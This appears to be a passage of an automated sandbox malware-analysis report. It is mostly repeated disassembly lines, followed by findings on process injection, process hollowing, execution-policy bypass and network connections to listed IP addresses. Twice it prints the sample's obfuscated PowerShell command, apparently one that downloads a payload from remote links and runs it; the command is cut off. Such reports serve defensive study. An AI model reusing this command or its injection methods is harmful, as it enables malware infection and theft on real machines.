            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A45B1 mov eax, dword ptr fs:[00000030h]5_2_013A45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A45B1 mov eax, dword ptr fs:[00000030h]5_2_013A45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014555C9 mov eax, dword ptr fs:[00000030h]5_2_014555C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014535D7 mov eax, dword ptr fs:[00000030h]5_2_014535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014535D7 mov eax, dword ptr fs:[00000030h]5_2_014535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014535D7 mov eax, dword ptr fs:[00000030h]5_2_014535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h]5_2_013A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h]5_2_013A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h]5_2_013A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h]5_2_013A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h]5_2_013A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE59C mov eax, dword ptr fs:[00000030h]5_2_013BE59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B4588 mov eax, dword ptr fs:[00000030h]5_2_013B4588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137758F mov eax, dword ptr fs:[00000030h]5_2_0137758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137758F mov eax, dword ptr fs:[00000030h]5_2_0137758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137758F mov eax, dword ptr fs:[00000030h]5_2_0137758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01382582 mov eax, dword ptr fs:[00000030h]5_2_01382582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01382582 mov ecx, dword ptr fs:[00000030h]5_2_01382582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h]5_2_013A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h]5_2_013A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h]5_2_013A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h]5_2_013A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h]5_2_013A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h]5_2_013A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140B594 mov eax, dword ptr fs:[00000030h]5_2_0140B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140B594 mov eax, dword ptr fs:[00000030h]5_2_0140B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BC5ED mov eax, dword ptr fs:[00000030h]5_2_013BC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BC5ED mov eax, dword ptr fs:[00000030h]5_2_013BC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013825E0 mov eax, dword ptr fs:[00000030h]5_2_013825E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h]5_2_013AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A95DA mov eax, dword ptr fs:[00000030h]5_2_013A95DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014005A7 mov eax, dword ptr fs:[00000030h]5_2_014005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014005A7 mov eax, dword ptr fs:[00000030h]5_2_014005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014005A7 mov eax, dword ptr fs:[00000030h]5_2_014005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013865D0 mov eax, dword ptr fs:[00000030h]5_2_013865D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BA5D0 mov eax, dword ptr fs:[00000030h]5_2_013BA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BA5D0 mov eax, dword ptr fs:[00000030h]5_2_013BA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FD5D0 mov eax, dword ptr fs:[00000030h]5_2_013FD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FD5D0 mov ecx, dword ptr fs:[00000030h]5_2_013FD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE5CF mov eax, dword ptr fs:[00000030h]5_2_013BE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE5CF mov eax, dword ptr fs:[00000030h]5_2_013BE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014135BA mov eax, dword ptr fs:[00000030h]5_2_014135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014135BA mov eax, dword ptr fs:[00000030h]5_2_014135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014135BA mov eax, dword ptr fs:[00000030h]5_2_014135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014135BA mov eax, dword ptr fs:[00000030h]5_2_014135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B55C0 mov eax, dword ptr fs:[00000030h]5_2_013B55C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F5BE mov eax, dword ptr fs:[00000030h]5_2_0143F5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F453 mov eax, dword ptr fs:[00000030h]5_2_0143F453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137C427 mov eax, dword ptr fs:[00000030h]5_2_0137C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E420 mov eax, dword ptr fs:[00000030h]5_2_0137E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E420 mov eax, dword ptr fs:[00000030h]5_2_0137E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E420 mov eax, dword ptr fs:[00000030h]5_2_0137E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A340D mov eax, dword ptr fs:[00000030h]5_2_013A340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B8402 mov eax, dword ptr fs:[00000030h]5_2_013B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B8402 mov eax, dword ptr fs:[00000030h]5_2_013B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B8402 mov eax, dword ptr fs:[00000030h]5_2_013B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0145547F mov eax, dword ptr fs:[00000030h]5_2_0145547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AA470 mov eax, dword ptr fs:[00000030h]5_2_013AA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AA470 mov eax, dword ptr fs:[00000030h]5_2_013AA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AA470 mov eax, dword ptr fs:[00000030h]5_2_013AA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01381460 mov eax, dword ptr fs:[00000030h]5_2_01381460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01381460 mov eax, dword ptr fs:[00000030h]5_2_01381460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01381460 mov eax, dword ptr fs:[00000030h]5_2_01381460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01381460 mov eax, dword ptr fs:[00000030h]5_2_01381460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01381460 mov eax, dword ptr fs:[00000030h]5_2_01381460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h]5_2_0139F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h]5_2_0139F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h]5_2_0139F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h]5_2_0139F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h]5_2_0139F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h]5_2_0139F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A245A mov eax, dword ptr fs:[00000030h]5_2_013A245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406420 mov eax, dword ptr fs:[00000030h]5_2_01406420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406420 mov eax, dword ptr fs:[00000030h]5_2_01406420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406420 mov eax, dword ptr fs:[00000030h]5_2_01406420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406420 mov eax, dword ptr fs:[00000030h]5_2_01406420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406420 mov eax, dword ptr fs:[00000030h]5_2_01406420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406420 mov eax, dword ptr fs:[00000030h]5_2_01406420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406420 mov eax, dword ptr fs:[00000030h]5_2_01406420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137645D mov eax, dword ptr fs:[00000030h]5_2_0137645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h]5_2_0138B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h]5_2_0138B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h]5_2_0138B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h]5_2_0138B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h]5_2_0138B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h]5_2_0138B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h]5_2_013BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h]5_2_013BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h]5_2_013BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h]5_2_013BE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_000E1AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000E1AC3

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.187.200 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 203.161.57.217 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.95 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_3492.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 2580Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 2580Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A1C008Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreX